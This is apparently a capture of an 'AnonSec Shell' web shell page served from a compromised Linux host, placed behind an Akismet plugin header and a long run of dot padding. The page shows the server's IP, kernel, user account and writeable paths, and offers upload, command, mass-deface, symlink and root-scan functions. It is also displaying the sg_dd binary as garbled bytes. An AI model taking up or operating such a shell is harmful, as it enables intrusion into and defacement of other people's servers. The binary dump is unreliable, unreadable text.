#/** * @package Akismet */ /* Plugin Name: Akismet Anti-spam: Spam Protection Plugin URI: https://akismet.com/ Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. Version: 5.4 Requires at least: 5.8 Requires PHP: 7.2 Author: Automattic - Anti-spam Team Author URI: https://automattic.com/wordpress-plugins/ License: GPLv2 or later Text Domain: akismet */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Copyright 2005-2025 Automattic, Inc. */ // Make sure we don't expose any info if called directly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 62.109.13.187  /  Your IP : 216.73.216.11   [ Reverse IP ]
Web Server : Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/8.2.28
System : Linux robothost.ru 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : mosrembit ( 6064)
PHP Version : 8.2.28
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /bin/sg_dd
ELF>jD@@H�@8	@@@@@@��88@8@@@���� ��`�`�( ��`�`��TT@T@DDP�td����@��@��Q�tdR�td��`�`/lib64/ld-linux-x86-64.so.2GNU GNU���u<I&��IA����6�� @68;BE���|�qX���9����T�!lC�?�X��pG#�����B�j2w *�_~f�4���+-dd��2T9����q�`�(�`x�`=8@��`dd@libsgutils2.so.2__gmon_start__sg_ll_readcap_10sg_get_num_initsg_ll_readcap_16sg_simple_inquirysg_scsi_normalize_sensesg_get_sense_filemark_eom_ilisg_get_sense_info_fldsg_get_llnumsg_err_category3sg_ll_sync_cache_10sg_ll_read_long10sg_chk_n_print3_finilibc.so.6strncmpposix_memalignperror__open64_2strncpy__stack_chk_failgetpidkillflockfgetsstrlensigemptysetmemset__errno_locationreadmemcmp__fprintf_chkfputcmemcpyfclosemalloc__xstat64sscanfstderrioctl__snprintf_chkfwritegettimeofdaysigactionlseek64strchrfopen64strcmpstrerror__libc_start_mainposix_fadvise64sysconffree_edata__bss_start_endGLIBC_2.7GLIBC_2.14GLIBC_2.4GLIBC_2.2.5GLIBC_2.3.4ii
�����ii
�ui	�ti	���`�`:�` �`(�`0�`8�`@�`H�`P�`X�`	`�`
h�`p�`x�`
��`��`��`��`��`��`��`��`��`Ƞ`Р`ؠ`�`�`�`��`�`�`�` �`! �`"(�`#0�`$8�`%@�`&H�`'P�`(X�`)`�`*h�`+p�`,x�`-��`.��`/��`0��`1��`2��`3��`4��`5H��H��� H��t��H����5�� �%�� @�%�� h����%�� h�����%�� h����%�� h����%�� h����%z� h����%r� h����%j� h�p����%b� h�`����%Z� h	�P����%R� h
�@����%J� h�0����%B� h� ����%:� h
�����%2� h�����%*� h���%"� h����%� h�����%� h����%
� h����%� h����%�� h����%� h����%� h�p����%� h�`����%ڍ h�P����%ҍ h�@����%ʍ h�0����% h� ����%�� h�����%�� h�����%�� h���%�� h ����%�� h!�����%�� h"����%�� h#����%�� h$����%z� h%����%r� h&����%j� h'�p����%b� h(�`����%Z� h)�P����%R� h*�@����%J� h+�0����%B� h,� ����%:� h-�����%2� h.�����%*� h/���%"� h0����%� h1�����%� h2����%
� h3����%� h4���ATI��hU��SH��H��dH�%(H�D$1������y�;~��e@������`1�H��r����}�����y��e@������<D�H�$Ic�H�H���=�� I�$tH�=�� I��H���Pl@�1�����1�H�L$dH3%(t����H��[]A\�AWAVAUATUSH��h
�Ɍ 
�� 
dH�%(H��$X
1���HDŽ$�����HDŽ$�����Ƅ$PƄ$PƄ$P�9
�G�H�^H��$P	�D$L�D$8L�t��D$$�D$ ��D$4�D$0H�D$H�D$(f�H�3H�����H��I���d�����$P	Ƅ$O
��t!<=u�f.���t
I��A�$<=u�t	A�$I����g@�H�������g@�	H����8D��$P	A��b����$Q	<p�5<s�;��$R	�-L���'��������� ��H��L9������
m� �����T$0��tp�D$0;S� tdH�
z� �-��~@���H�
_� �"��0s@�{����H��$X
dH3%(��"H��h
[]A\A]A^A_Ã|$4�
H�D$H��?���kH�D$(H��?���Z�=)� ~H�|$�0
�|$ ��
�=}� tH�
�� ����~@�����=r� �~�|$$� ED$ �D$ ��Q@��,��Q@���,��Q@�
��,�`Q@�
��,��$P�� ������� ����<-���D$4�D$0��$P<-���D$$A���$P�D$\�����D$d�UA�����b�=A� t����%H��� H��x�=�� ��H�����D$4HDŽ$�����DŽ$������T�D$4 ��H��$�H9D$(}
H+D$(H��$��D$$HDŽ$�����DŽ$��������D$$ ��H��$�H9D$}
H+D$H��$�H�� H���X�|$8ui�D$4t*�=n� t!HD$(�����H9���$�|$ ����$�D$$t1�=�� t(H�T$H�� �����H9��/)�|$ ���!)�=� u"�=� u�=Ƈ u�D$$D$4���#��j����T$ H��$�H���� Hc��������H��$�H�Ã=� t,1����`H�� H�� ����� H�� L��$��D$8�D$<�D$HH��H��� H���7#Lcl$ �|$8�ET$<I9�LO�D$4�T$<D���y
L�l$@D�t$PD�l$0�@�S����8u!�8� H��D����Hc��7�����I��A��xՃ=:� D�t$XL�l$@D�t$P�:E����"�
� D��E9�~!D��H�� ����҉�~
�#� ��Lc�L=� ���c"��$P��D�t$@L�|$PD�t$\������8u!��� H��D����Hc������I��A��xՃ=�� D�l$`M��D�t$@L�|$P��E����!�=څ ��L;=Q� ���D$$��H�=� � �
� A��H�5� H��D��L$@Mc�L��������HcL$@���D$$��L=� �=� ���D$8E1�=~� t�D$4�� �ƒ������
�� ��t�D$d�� �����������t�D$$�� �ƒ�����C
H�m� H��~
L)�H�^� L|$(L|$�\$<���L������„ �|� ������g@�H����+A��c����$Q	ou��$R	euu��$S	ukL���K����m� �'� �*���f.�L���(����n� �(� �������$R	t����g@H�������D��g@�
H�������g@�H�������g@�H�����A�<$-uA�|$1uA�|$�~���L������H�� H���e���H�
� � ���s@�*�������L���H����D$8�^� �� ������$S	����L����������D$ ���D$$���L�������Z� ����H�
�� �$��xs@������A��d�
��$Q	i�h�h@H���[����A��o����j@H���<�����Dh@H���'���&!�Jh@H������� �Rh@H������~ �Wh@H�������- �xf@H������� �\h@H���������ah@H�������L�����b� ���f�H��$P�L���;��$PƄ$O�L��$PA��g@A������ H���X���I�׾,L���x�H��tNH�P�L��L��L���tǿ�g@L��L���t���f@L����t���f@L����u
�� �1�뵿xf@L�����{���H�=�� L����f@�1���H�
j� ���@�@������A��f���$Q	u�����$R	a������$S	����L���p��������`� ��� �E����D$4;�� �d���������$R	o�������$S	�|���L����� �<� ��H�
� �(��`~@���@����`�`L���/�����H�
j � ���s@������H�
E ����h@�a����H�
  ����g@�<����H�= ���}@�1��� �0��F�H�
�~ ���Xs@����p�H�
�~ �8���r@����0�H�
�~ �!��8~@���+�D$$�M��~ L��$@H�l$@��$���~ �D$h��ŋ�~ D�
�~ A�H�L$�5a~ ��L��D�=�~ HDŽ$��$��$����1�L���H��&~ DŽ$�SL��$�DŽ$�����Ƅ$�@DŽ$`���$�H�D$@H��$�H��$PH��$�D$D����$��$�D�|$PD��$���tDŽ$�=H~ ~�aD�#������1�L�⾅"D�������xڃ=~ ~��$,H�=} ��f@�1��J�L�������������$��@��$#H��$H��$���} H�l$@�u����6H��$�H�=�| 1���@�����=z} ~�L���i@�B���$�t��$0����tDŽ$�Lc�L=d} �=�| ����$����D$H�D$8E1��7���1҃=�| L���i@�L$P������L$P�Q�A�σ��#��A����sA����@������{ H�
�{ ������{ �K�����@���1��P���H�
�{ ����i@�r| A�����l���H�l$@����1҃=:| L���i@�L$l�����/| �=l{ �L$l�]�����Q�A������H�L$H�=�z ���@A�ؾ1�A��1�1����A���T@���K��z H�
�z ������z �_
� ��Ї@���1��S����������A�������������@�p�D��A���w���@�������H�T$|1��r"D���������|$|��D$| �
�z �D$|ȃ����9ÉD$ �X
H�=z ���ú��@�1�1��A����H�
�y ����i@E1����=z ~3DC�L=H�=�y 1���f@����A�GI��;�y |�H�5�y �
�Q��D���E����	�|$h�8H�L$H�=\y 1���@����Iz �l$h�5z ���������1�*z ����D$`���y D��y L��$�H�L$(�|$0D��H�$�H��$�H�$�1���A����
E���9��$�9�~
H��x ��Lc�L=�y �=&y �D$X����$��T$H��=gy �j�L��D����H�����=Ay ~H�=Dx H���X�@�1���L=9y �D$8E1��<�D$$��L='y �D$8E1���
�x H�=�w E���Ui@�1�A���"���|$`�)�|$\1�1��� ���A���
x ��H�L$H�=�w ���@�1������w ���H�L$H�=kw A�غ�@�1���1҃=Bx L���i@��������E�����1�1��D������A�����H�L$H�=w ��@�1��G��v�
�w H�=�v E��X�@�1������S�|$X��Hc�w HcT$X1�H�D$(�|$0�H��	���A�����H�L$(H�=�v ���@�1�����I��L�|$@���
�;��8u!� w L��D����Hc��_���H��A��xՃ="w H�ډ�A��L��E��L�|$@~-�
�v H�=v A�ЉT$@��@�@1����A�D�L$@E�����v ��D9���L=�v �D$8���D�D$PH�L$�X�@H�=�u �1�H�l$@����C����D$8E1�����L��-gv ����
H��$PD�e�H����H��$P�ljD$4�DH�==u H����h@�1��y��D$4�H�ٺ�h@���D$4 t�L$4�ȃ��=�u D��D$4�D$4���D$4���=ku E�A�����A��HD����=Zu DE�D����=Eu tD��A����H���C����D$0����Y
���/
�|$0H��$�1�D�����������$����t ���D$4 ���D$ H��$��|$0��t H��u"��$�1�����y
�X@���|$01�H�꾂"����x��$�/u�OH�
�s � ���@�������H�
�s ����g@�����F�H��$P�H��$P�D$d��1��A�R����D$\�u��1�L��$PH��$P�A��@���1����H��$P�������������-�s ����H��$PD�e�H���uH��$P�ljD$$��H�=�r H���i@�1����D$$ t�L$$�ȃ��=s D��D$$�D$$�J�D$$�A�=�r H��E�A�����A��HD����=�r DE�D��
�=�r DE�D�������A��I��A���@�
���nH��$�1�D��D�������q��$���dr ���D$$ �a�=@r ����D����������D���y�H��$PI��A���@���1��2�H��$P��������	��$Q	b����j@H����������$Q	f�6���$R	����<2����$S	����$P��H��$P�L������L�H��$PE1�H���y�D$$�)�����$R	s�e�����$S	�W���L�����D$4����$P��H��$P�L�������H��$�H��$�D�����������j���|��	H��$P�4H�=Ap ���@�1������|$0H��$�H��$��r�����������(	��	H��$P�H���\H�=�o ���@�1����A�����A������sg@�|H��$�H���&H��$�H���H9�HN�H�oo ��|$0���H�
`o �3���@�|�����=�o H��E�A��A��@D����=�o DE�D��
�=�o DE�D�������D$0I��A��@�����X
H�D$(H��tJLc%�o �|$01�L��L����H��I��A��@����tH�=�n L�� �@�1�����=5o �[
�=$o �]��|$0������|$0�C����L������n ��n ���D$$�+�=�n E�A������D$$�%	A��@H��D����=an DE�D��
�=Jn DE�D�������A��I��A�(�@����t-H�=�m A��@�ng@�gg@E��X�@HDȾ1�����H�D$H�������Lc%\n 1�D��L��L�����H���N�������H�=cm L�Ẩ�@�1�����g��������@A��`����g@L�D$H�=m �j@�1��^��E��t�|$8t�|$<~�D$$
���=�m t1����|$Lt�D$$��H��$����H�=zm H��t�p���|$0t	�|$0�`��A��t�D$$��H�=l t'H�
~l ���wj@���E���cDD���g@��|$H���
�m ��tH�=8l ��@�1��w���cE��AI�����T$<H�5�l D����l Hc��������y
�����8tӃ=�l ~&�L$<H�=�k A���
�l ��@�1��
��������L�L$H��$PA�H�@���1��)��H��$P�|������L$HH�=lk ���@�1����1�1���j@�=�����������H��$�������H���������������|$0H�T$|1��r"��������|$|��D$| �
�k �D$|ȃ����A9ʼnD$ �8A������sg@L�D$(H�=�j �(�@�1�M���������H�=�j ���Є@�1������c�1�H��$PE1�H�����D$4�2�������i@�w��A�����H�L$H�=0j A�غ��@�1�E1��i���D$8�/�A��� ���H�L$H�=�i M���@�1��2���p�D��j D��$�E9����H�=�i H��$P��@�1�����u�H��$�H��$�D���h������D�Ij D��$�E9��=�H�=ai H��$P���@�1����HDŽ$�������A��i�����$Q	<bt><f�����$R	�����$P�JH��$P�L�������3����$R	s�����$S	��L������D$0����|$0H��$�H��$��}����t,H�=�h H��$P�`�@�1�����HDŽ$�����D�6i D��$�E9�����H�=Nh H��$P���@�1����HDŽ$��������I��A�x�@H��$P���1����H��$P�����������H�=�g H��$P�`�@�1����HDŽ$��������H�
�g ����g@������H������D$H�=~g H��$�L��$�L��$�H��H�$�0@�1������H�=Bg D	�@���1��|����D��H���������D$01������H��$PI��A��~@������H��$P���������D��$�D��g E9��D��H�=�f H��$P��@�1��������H�=�f ���ú�@�1�����H��$�D�8g H�L$(�|$0L��$���H�$H���A���u��9i@�7���$�����$�0�����H�=f ��j@�؉@�1��W������D������f���H�=�e H��$P�<j@�1��%��E1�E1�1�1�1��D$�$D���b����u>H�
�e �-��x�@�����D$�$E1�E1�1�1�1�D������������H�
`e ���Zj@�|���y����9i@�=�����H�l$@���D�-�e D��Mc�L������H��H��e �L��1�H��������A��A@��H��D����=7e DE�D��
�= e DE�D����=�d DE�1�D�������A��I��A��@�����u���H�=�d D���@�1��������H��$�H�Yd H�Rd H���R��H�
Jd �*�� �@�f���c�����|$01�1������������H�=d ���P�@�1��H���l���H�
�c ����i@A��������L�L$A�x�@H��$P���1�A���B��H��$P������L�L$(A�si@�E1�����|$ �=@d Hc��(��H��H��H��$��+��H�
Mc ���!i@�i���c����H�
(c �9��P�@�D����c �>��H�
�b �(���@��������fh@H������������mh@H���������A��-uf��$Q	?u��$R	�����j@H�������t��$Q	VuD��$R	u:H�=bb �ph@�~h@�1����1�������j@H���3����t�H�=(b H�麉h@�1��d�����H�
b �>���t@�$��H�
�a �����v@�	��H�
�a �M���z@����1��q��L�������b ����L������D$L����L���k��H�D$(H������H�
ua ���`t@�������L���/��H�D$H������H�
9a ���@t@�U�������L���s����a �a ���N��H�
�` �"��t@�������� �`L���L�����H�
�` � ���s@������Y��H�=�` ���@�1������M���H�={` �Ђ@�1�����0���H�
^` �)��x�@�z���|$0H��$�H��$���,�H�
%` �(��H�@��H�=
` ���@�1��L�����H�
�_ �*���@���H��$�H��$�D���$�^�H�
�_ �)����@��H�
�_ ���h@�����<���D$ H��$��u"�:` H��D����$�1������y
�X@�H��1�H�꾂"D���������X���$�/u�:��B�H�
_ ���*h@�-�������D$H�=�^ H��$�L��$�L��$�H��H�$�0@�1�������H�=�^ D��؀@�1������r�H�=�^ H�ٺ�h@�1�������������H�
g^ �9����@�����^ ���H�ٺ�~@H�=5^ �1��y�����4���H�L$H�=^ �`�@1��A���N��D��=�^ H�H_ ������^ ���L�L$A�"j@����Hc
�^ H�=�] M��H�L$��@�1�A�������i@����|�A�����g@�����1�I��^H��H���PTI�`d@H��c@H�ǀ@�=���f.�f���`UH-�`H��H��w]øH��t�]��`�����`UH-�`H��H��H��H��?H�H�u]úH��t�]H�ƿ�`����=�\ uUH���~���]��\ ��@H�=�X t�H��tU��`H���]�{����s���UH��1�S��H��H��dH�%(H��$�1��e��H�<$t%H�|$H�,$�p��1�H���DŽ$��9��H��$�dH3%(u
H�Ĩ[]��w���E1�@����H���������� ����@����ud��u?��u��u�Mc���d@�I�L����McȾ�j@�I�A��L�����Ic�H�raw deviA��H�H�9�Ace �McȾ�d@�I�A��L����McȾ�d@�I�A��L����^���McȾ�d@�I�A��
L����7���McȾ�d@�I�A��L���������d@�
H��A����@f.�H�
�Z SH��H���\D�
�[ L��[ H��H�=�Z �e@�Ic�I)�1�����D�
�[ L��[ H��H�=uZ �#e@�Ic�I)�1�����
�Z ����D�Q[ E��~H�==Z H�ٺUe@�1��y��D�[ E��~H�=Z H�ٺle@�1��R����Z D��Z ��u�3Z ��uE����[�@H�=�Y H�ٺ�e@�1��
��D��Z H�ٺ�j@[H�=�Y �1�����f.�L��Z H�=�Y H�ٺ9e@�1��������f�H�=YY ��d@�1�������H�ٺ�e@�fDAWE��AVE��AUA��Hc�ATA��1�UH��SH��H������D$@��t�KE��t�KA��
���A����A����A��@�k	D�k
����v�H��H��8�CH��H��0�CH��H��(�CH��H�� �CH��H���CH��H���CH��H���CD����C
D����CD����C1�H��[]A\A]A^A_�f�A��@�kD�k	����V�H��H���CH��H���CH��H���CD����CD����CD����CH��1�[]A\A]A^A_�A����A��@�k����
�H��H�����CH��H��A���C��D�k��J�D-�����Pk@H��u?D|$@�!���H�
mW �?���k@��������D��l@H�=9W �1��}��H���[]A\A]A^A_�f�A��D�k@�k����*�H��H���CH��H���CH��H���CD���A�����C�s��������k@�w�����C�����H�
�V �<��k@�����*����f.�SH��H��dH�%(H��$�1����H��tiH�T$H�޿�������x,�D$(%�= tJ=`� t=���H��$�dH3%(���@H�İ[À;.u����H�L$8H��H��H�� H��%��	Ѓ�tY=��t���t7��	�t��=�U tMH��H��H�� ��%�	�;�U �`�����[����@�T���H����H��0�	Ѓ�u��c����4f@��e@�LU �s��H��H���1H��$ H�ھ����H����H��$�H��$ 1��f@�����u�H��$��	�
f@�����u�H��$ H�ھ����H����H��$�H�T$H��$ 1��f@�N����u2��$�bu���$�su���$�gu���$�u��D$�gT �=4U ~�
XT H�=1T �f@�1��p��H���X��H�L$8����=�T ~�H�=�S ��e@��l@�1��8���ƃ=�T t�����8�a��H�=�S I����e@��e@�1����H�L$8�������f�AVA�A�A��AUI��ATI��US1�H��@dH�%(H�D$81��[T H�L$�P���E�1�1��$�������ue�D$<����T$����	��T$	��T$��	��T$H��I�E�D$����	��T$	��T$��	�A�$1�=�S u#H�|$8dH3<%(����H��@[]A\A]A^�I�ME�$��l@H�=�R �1�I������븀|$��U����|$��J����|$��?���H�L$1�1��$A�A� D���*�������m���H�T$H�t$1�H��H��H���B�H	�H9�u�H���T$I�E�D$����	��T$	��T$��	�A�$�����d��@AUATUSH��8dH�%(H�D$(1���R ����H�=�R A��uH�=�R ��H�|$1�H��R H�-�R �#��L�D$L�L$L+bR L+
cR ���I*�H�=iQ E���I*ȸ�g@�.f@��l@�HD�1�D�%R �Y�<�X��L$�y���L$f.
�<vH9��A*�HM��H*��Y�f.�<wJH�5�P �
���H�D$(dH3%(uRH��8[]A\A]�fDI��I��@B�C�����Y
�<H�=�P �6f@���^��������f�H��H�
uP � ��m@����SQ ��t
��]����Gf@H���o���Df.�S��H��H�|$H�$dH�%(H��$�1��1���1�H���DŽ$����H�
�O ���Jf@�����P ��t1�������g@����߿���މ�����H��$�dH3%(u	H�Ġ[����DAW�AVAUATU�pf@SH��H��H��H��dH�%(H��$1��4����<$Ƅ$���I��A�A�A���M��tmM�Ǿ,L���}���H����L�@�L��H��L���t�A���ctg��duiA�i����f@L��L�����M���Cu��1�H��$dH3%(��H��[]A\A]A^A_�DA�otI��f@L��L���t�f.��wf@L��L������C�"���@E1��;����A�eu�A�u��C���f�A�o�.���A��#����C����A�pu�A�ou�A��u����C���f��}f@L��L���tN��fuUA�uuNA�auGA�u@�C �l���fDH�
qM ���af@荿�������C�5�����f@L����t.��f@L��L���������g@L��L���u�C,����C(�����f@L��L���u	�C4������f@L��L���u�C$����:���H�=�L L����f@�1���������DAWI��AVI��AUA��ATU��SH���5M H��$@L�L$H��$�D�
M D�D$E1�H�D$dH�%(H��$�1���L �$���A���yH�\$@1��H���H���L �D$@S�D$D����L�|$P�D$I@�D$h`��D$HH��$�D�t$pH�D$X�D$A�ʼnD$LH��$�H�D$`H�D$H��t�0��t�D$l�=�L ��H�
�K ����f@E1�譽���
�K ��~4B��<�H�=`K 1���f@�蟽��A�GI��9�K �H�58K �
����@���������1�H�ھ�"��跻����xۃ=�K ~��$�H�=�J ��f@�1��+���H���s�������L�L$`D��$��D���$�`�@�H�=�J E��L��8m@�1�A��ܼ��H��$�dH3%(D����H��[]A\A]A^A_Ã�A�����tɿpm@A������E����H�T$D��L�σ9K �������H�D$H�=J ��m@�H�1��T����=�J ~�H�޿�f@蹼��f�H�D$H��t ���t��$�����tH�D$���$��J ����1҃=�J H�޿�f@A�����X�������=,J � �dJ �mJ A������1҃�H���¿�f@��������=1J ~&�H�޿�f@D�T$L�L$���D�T$L�L$H�T$D��L�σJ A�踻�����d����=�I uH�D$H�8�L���H�
�H �E��n@A�����&�����I ��I A����9�������H�=�H E��L���m@�1��ĺ��1҃=_I H�޿�f@���+����v����=CI ~&�H�޿�f@D�T$L�L$����D�T$L�L$H�T$0D��L��D�T$L�L$蝹����L�L$D�T$������|$2d�z����|$3�o���L�D$,1�1�D��L���Q�����L�L$D�T$t�T$,��u��H A���������H�\$D��L��H���Q���H�;t��H A����H�
rG �J��Xn@莹���f�f.�AWAVAUATA��USH��H��$�L�L$ H�D$0dH�%(H�D$x1���G �҉D$H��C�I��H��D��A���D$,�D$LH�A��H�D$@Ic�H�D$8H�D$pL�L$ L��A��H��D��H�$D��H�D$p�����p�����$��@@A���G D���H�L$xdH3%(�JH�Ĉ[]A\A]A^A_�f.��������f�H�D$0H��tDt$,D�0D�
�F E��~
��F 1��@D�D$HE���H�L$pMc�I�H9���L9���A��A)�E���.�
�F ���H�D$pL�L$ D��A��H��L��H�$D�������P���z�$ո�@H�
�E ����f@襷�������RE H�
[E �����@E ������n@�f���fDE��D+t$,E���E���H�D$0H��������L$,�1����@��D H�
�D ������D �.� ���n@����@A�ǃ=FE �-���E1�DA��1�L��D�L$ Hc��:���H�=�D 1�A��H��hr@��̶��A��D�L$ t H�
jD �I���r@膶��D�L$ H�D$0H��tDt$,D�0�E ��~�
�D �Q9Љ�D ��E��D�������1����A��|$H���)H�=�C 1�H��o@��+�����D �l$H��D �����������D ���E1���D$,�&D D�҉D$,����@��D�-D A��H�I�Ic�H�E�������������H9D$p��H�|$@D�T$\�T$X���H��H�D$P�T$XD�T$\�1���D�
�B ��L�D$P1��‹�C �D$Aى�D��D�T$X�T$\�D$H�D$lH�$�y��������D�T$X�$�`�@f�H�=�B D��o@�1��������H�=�B �Xp@�E��H��1��Ҵ��H�T$81�L�������D$,Ll$8H�����D$,�%C ���!����
C �Q9ЉC �
���H�D$0H��tD�T$,E�D�H�
B �+��8r@�:�������A��0���DH�
�A ���?g@������K���H�
�A ���!g@�ݳ��������#���H�
�A � ���o@赳������H�
qA ����o@荳�������H�=IA H��r@�1�腳��H�T$81�L���Ʊ������H�=A ��A�Ǻp@�1��S���E1ɋ�A ���B��������E��AE��a���H�T$8H�t$PL���A �(����H�|$P�v����>���H�
�@ �#��hq@�Ʋ��fDH�T$81�L���!����H�
x@ �"���q@蔲����H�
[@ � ��q@�w����H�
>@ �!���q@�Z����H�
!@ � ��@q@�=����x���D�
�? A�D+L$lA����D9L$L�~��@ D��)؉�? ��t,H�=�? D�ɺ�p@�1�D�L$X���D��@ D�L$XH�D$lL�D$P�T$\1�D�T$�D$H�$��D�������������H�=i? ����p@�1�覱�����H�=J? ����q@�1�臱�����f��D$,����H�
? �+��8r@�8���D�����H�=�> I���1�I��8o@�1����5c? ��u��M���A������A�A���������n@�а����������g@貰������A��H�D$0H��t�D�8�H�=_> D�ɺ�p@�1�蛰�����H�=?> �ٺ0p@�1��|�����������荮��H�
> ���Ug@�2������z���f.�AWA��AVI��AUI��ATL�%�9 UH�-�9 SL)�1�H��H������H��t�L��L��D��A��H��H9�u�H��[]A\A]A^A_Ðf.���H��H���null device SCSI generic (sg) device block device fifo (named pipe) SCSI tape device unable to 'stat' file   remaining block count=%ld
%s%ld+%d records in
%s%ld+%d records out
%s%ld bypassed records out
%s%d recovered errors
%s%d retries attempted
%s%d unrecovered errors
%s%d unrecovered error(s)
BLKSSZGET ioctl errorBLKGETSIZE64 ioctl error/proc/devicesfopen %s failed: %s
Character%d %sfound bsg_major=%d
 so far at %.2f MB/sec
  Interrupted by signal,no flag found
appenddsyncexclnocachenullsparseflockunrecognised flag: %s
direct    read cdb: %02x       duration=%u ms
readingDevice (r) not ready
Unit attention, too many (r)
ENOMEM again, unexpected (r)
device (r) not ready
>> heap problems
createopen try reducing bpt,appblk_sgiosg_dd: bad argument to 'bs='
cdbszcoe_limitconvno conversions found
noerrornotrunccountSecond IFILE argument??
iflagSecond OFILE argument??
Second OFILE2 argument??
oflagretriesseekskiptimeverb--help-h5.79 20131014sg_dd: %s
Unrecognized option '%s'
bpt must be greater than 0
 >> Input file type: %s
sg_dd: unable access %s
INQUIRY failed on %s
 >> Output file type: %s
Not enough user memory
RESERVED_SIZE ioctls failedread(unix): count=%d, res=%d
sg_dd: reading, skip=%ld zeros_buff malloc failed
lseek64 on output    write cdb: writingdevice not ready (w)
Unit attention, too many (w)
sg_write failed,%s seek=%ld
sg_dd: writing, seek=%ld >> Synchronizing cache on %s
Unable to synchronize cache
Some error occurred,/proc/scsi/sg/allow_dioodir--versother (perhaps ordinary file) %s%d read_longs fetched part of unrecovered read errors
sg_dd: for 6 byte commands, maximum number of blocks is 256
sg_dd: for 6 byte commands, can't address blocks beyond %d
sg_dd: for 6 byte commands, neither dpo nor fua bits supported
sg_dd: for 10 byte commands, maximum number of blocks is %d
sg_dd: expected cdb size of 6, 10, 12, or 16 but got %d
      [bgs64] number of blocks=%ld [0x%lx], block size=%d
found no bsg char device in %s
      number of blocks=%ld [0x%lx], block size=%d
time to transfer data%s: %d.%06d secsProgress report, continuing ...
sg_dd: bad rd cdb build, from_block=%ld, blocks=%d
reading (SG_IO) on sg device, error    lba of last recovered error in this READ=0x%lx
Recovered error: [no info] reading from block=0x%lx, num=%d
Medium, hardware or blank check error but no lba of failure in sense
MMC READ gave 'illegal mode for this track' and ILI but no LBA of failure
Aborted command, continuing (r)
Aborted command, too many (r)
Unit attention, continuing (r)
>>> retrying a sgio read, lba=0x%lx
  Unrecovered error lba 0x%lx not in correct range:
	[0x%lx,0x%lx]
  partial read of %d blocks prior to medium error
Unit attention, unexpected (r)
Aborted command, unexpected (r)
>> unexpected result=%d from sg_read_low() 2
>> bs=%d too small for read_long
>> unrecovered read error at blk=%ld, pdt=%d, use zeros
>> read_long(10) len=%d unexpected
read_long(10): adjusted len=%d
>> unexpected result=%d on second read_long(10)
>> read_long(10); not supported
>> read_long(10): bad cdb field
>> read_long(10): device not ready
>> read_long(10): unit attention
>> read_long(10): aborted command
>> read_long(10): problem (%d)
>> read_long(10) cannot handle blk=%ld, use zeros
>> coe_limit on consecutive reads exceeded
>> unable to read at blk=%ld for %d bytes, use zeros
>>   try reducing bpt to limit number of zeros written near bad block(s)
Won't default both IFILE to stdin _and_ OFILE to stdout
For more information use '--help'
sg_dd: bad argument to 'bpt='
sg_dd: bad argument to 'coe_limit='
sg_dd: bad argument to 'count='
sg_dd: bad argument to 'iflag='
sg_dd: bad argument to 'oflag='
sg_dd: bad argument to 'retries='
sg_dd: bad argument to 'seek='
sg_dd: bad argument to 'skip='
Usage: sg_dd  [bs=BS] [count=COUNT] [ibs=BS] [if=IFILE] [iflag=FLAGS]
